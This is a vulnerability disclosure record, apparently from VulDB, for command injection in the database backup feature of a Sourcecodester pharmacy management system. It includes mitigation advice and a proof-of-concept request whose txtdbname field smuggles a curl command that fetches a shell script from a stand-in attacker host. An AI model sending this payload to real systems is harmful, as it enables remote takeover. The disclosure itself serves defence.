| 标题 | Sourcecodester Web-based Pharmacy Product Management System edit-product v1.0 Command Injection |
|---|
| 描述 | **Critical Security Advisory: Remote Command Execution in Pharmacy Management System**
**Vulnerability Summary**
Title: Unauthenticated RCE via Database Backup Functionality
Affected Version: Web-based Pharmacy Product Management System ≤ v1.0
Risk Level: Critical (CVSS 9.8)
Discovery: yaklang.io, IRify, Yakit
**Core Vulnerability Analysis**
1. **Insecure Implementation**:
- Backup functionality accepts unvalidated user input for database credentials (servername, username, password, dbname)
- Directly interpolates user-controlled $dbname into:
* File path construction ($backup_file_name)
* System command execution (exec() call)
2. **Attack Chain**:
① Attacker controls all database connection parameters
② Exploits path normalization in file operations
③ Achieves arbitrary command execution via:
```php
exec('rm ' . $backup_file_name); // $dbname可控导致RCE
```
**Technical Impact**
- Full system compromise via arbitrary command execution
- Potential PHI/PII data exfiltration (HIPAA violation)
- Possible ransomware deployment
- Supply chain contamination risk
**Proof of Concept**
```http
POST /backup.php HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded
txtservername=attacker-mysql&txtusername=user&txtpassword=pass&txtdbname=./;curl${IFS}attacker.com/shell.sh${IFS}-o/../tmp/shell;./
```
**Mitigation Strategy**
1. **Immediate Actions**:
- Disable backup.php functionality
- Implement input validation:
```php
$dbname = preg_replace('/[^a-zA-Z0-9_-]/', '', $_POST['txtdbname']);
```
2. **Secure Coding Practices**:
- Use parameterized database connections
- Implement secure file operations:
```php
$backup_dir = '/secured/backups/';
$safe_path = realpath($backup_dir).DIRECTORY_SEPARATOR.basename($dbname).'.sql';
```
3. **System Hardening**:
- Implement least privilege for web server user
- Deploy WAF with command injection rules
- Conduct forensic audit of affected systems
**Compliance Implications**
This vulnerability constitutes:
- HIPAA Security Rule violation (§164.308)
- PCI DSS Requirement 6.5.1 non-compliance
- GDPR Article 32 breach notification requirement
**References**
- CWE-78: OS Command Injection
- OWASP Top 10 2021: A03 Injection
- NIST SP 800-115: Command Injection Countermeasures
**Note**: This vulnerability enables complete system takeover. Organizations should assume compromise and initiate incident response procedures immediately. |
|---|
| 来源 | ⚠️ https://github.com/yaklang/IRifyScanResult/blob/main/Web-based%20Pharmacy%20Product%20Management%20System/rce_in_backup.md |
|---|
| 用户 | lingze (UID 83608) |
|---|
| 提交 | 2025-04-08 16時42分 (12 月前) |
|---|
| 管理 | 2025-04-16 15時38分 (8 days later) |
|---|
| 状态 | 已接受 |
|---|
| VulDB条目 | 305075 [SourceCodester Web-based Pharmacy Product Management System 1.0 Database Backup backup.php txtdbname 权限提升] |
|---|
| 积分 | 20 |
|---|